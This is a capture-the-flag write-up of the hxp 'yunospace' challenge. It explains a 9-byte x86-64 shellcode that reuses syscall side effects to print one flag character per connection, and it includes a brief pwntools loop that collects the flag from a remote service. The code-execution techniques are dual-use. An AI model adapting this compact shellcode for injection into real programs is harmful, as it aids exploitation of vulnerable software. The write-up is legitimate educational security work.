How does free code execution sound to you? If only the whole thing wasn’t that narrow.

yunospace was a very interesting challenge, it had a very clear target but was very tricky to achieve.

At first yunospace creates two empty mmaped regions at randomized adresses, these are used as code (rx) and stack region (rw).

9 bytes are read from stdin and put into beginning of the code region. One character of the flag we can choose is put right after our input. Then all registers besides rsp which points into the middle of the stack region are zeroed and we jump to our code.

So clearly we have to write 9 bytes of machine code with a working empty stack to print the flag character.

Some hours spent experimenting and browsing Intel Assembly Manual, this is what we came up with:

from pwn import *
  000000:       0f 05                   syscall
  000002:       01 ca                   add    edx,ecx
  000004:       51                      push   rcx
  000005:       5e                      pop    rsi
  000006:       ac                      lods   al,BYTE PTR ds:[rsi]
  000008:       0f 05                   syscall

flag = ""
for i in range(58):
    c = remote("", 8664)
    out = c.recv(10)
    flag += chr(out[6])

So what is happening here?

00:    0f 05    syscall

Since all registers are 0 this effectively does a read(0, NULL, 0), so the syscall tries to read 0 bytes from stdin into a NULL pointer. Conveniently this does not crash, but has the very important sideeffect of loading the address after the syscall into rcx. A rip-relative lea would need 7 bytes, a call pop combo would use 6 bytes. This version combined with the next only uses 4!

02:    01 ca    add    edx,ecx

This adds ecx to edx, which specifies the length of the write syscall. We just need edx to be >6 to print the flag character after our code so any big positive value works for us, we do not care about a page fault after we have received our output. Most importantly this instruction has opcode 01 which will be used later.

04:    51       push   rcx
05:    5e       pop    rsi

This moves the 64bit-address from rcx to rsi wich specifies the buffer to print for write. It only needs 2 bytes because push and pop are two of the few instructions that do not need REX-Prefix for 64bit.

06:    ac       lods   al,BYTE PTR ds:[rsi]

lodsb loads the value at the address pointed to by rsi into al and then increments rsi. So al = [rsi]; rsi++. Since rsi points to our add edx,ecx instruction which has opcode 01 this sets rax to 1, the syscall number for write! This was the last bit of magic we had to find to save that crucial last byte!

08:    0f 05    syscall

write(0, <address of add + 1>, (32bit-truncated) <address of add>). This writes to stdin (not stdout!) since rdi is zero. But we still get the output on our terminal! (Thank you linux!). This behaviour means we do not have to set rdi to 1 for printing to stdout which saves us 2 bytes.

The program subsequently crashes but we already have what we want so we don’t care.

Flag is hxp{y0u_w0uldnt_b3l13v3_h0w_m4ny_3mulat0rs_g0t_th1s_wr0ng}